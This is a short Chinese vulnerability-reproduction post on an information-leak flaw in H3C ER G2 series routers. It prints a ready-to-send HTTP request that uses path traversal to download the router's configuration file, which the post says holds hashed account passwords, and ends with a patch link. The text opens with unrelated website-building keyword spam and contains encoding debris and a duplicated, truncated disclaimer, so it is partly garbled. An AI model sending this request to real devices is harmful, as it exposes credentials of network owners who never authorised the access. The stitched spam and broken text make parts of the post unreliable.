网站建设寮步,如何做网站的实时画面,公司网站建设的策划方案,基于WordPress的交流社区声明 本文仅用于技术交流#xff0c;请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失#xff0c;均由使用者本人负责#xff0c;文章作者不为此承担任何责任。
一、产品介绍 H3C ER2200G2是H3C推出的新一代高性能企业级路由器#…声明 本文仅用于技术交流请勿用于非法用途 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失均由使用者本人负责文章作者不为此承担任何责任。
一、产品介绍 H3C ER2200G2是H3C推出的新一代高性能企业级路由器采用全新硬件架构、具备丰富的软件功能、支持全面的安全策略。定位于以太网/光纤/xDSL接入的中小商业市场SMB可部署于需要高速Internet接入的政府机构、中小企业、餐饮连锁、酒店、学校、医院、网吧等网络环境。
二、漏洞介绍 H3C ER G2系列版本存在敏感信息泄露漏洞。攻击者通过actionpolicy_status跳转别的接口利用该漏洞访问ER2200G2.cfg文件。
三、影响版本
漏洞名称H3C ER G2系列路由器敏感信息泄露漏洞厂商华三危害等级 高危
四、漏洞复现
1.访问漏洞环境 2.Poc
GET /userLogin.asp/../actionpolicy_status/../ER2200G2.cfg HTTP/1.1
Host: xxxxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: image/avif,image/webp,*/*
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate
Connection: close请求该地址查看响应结果 此文件中还存在泄漏的账户密码信息。(此处为MD5加密 五、修复建议
目前厂商已发布升级补丁以修复漏洞补丁获取链接
https://www.h3c.com/cn/Products___Technology/Products/Router/Catalog/ER/ER3200/
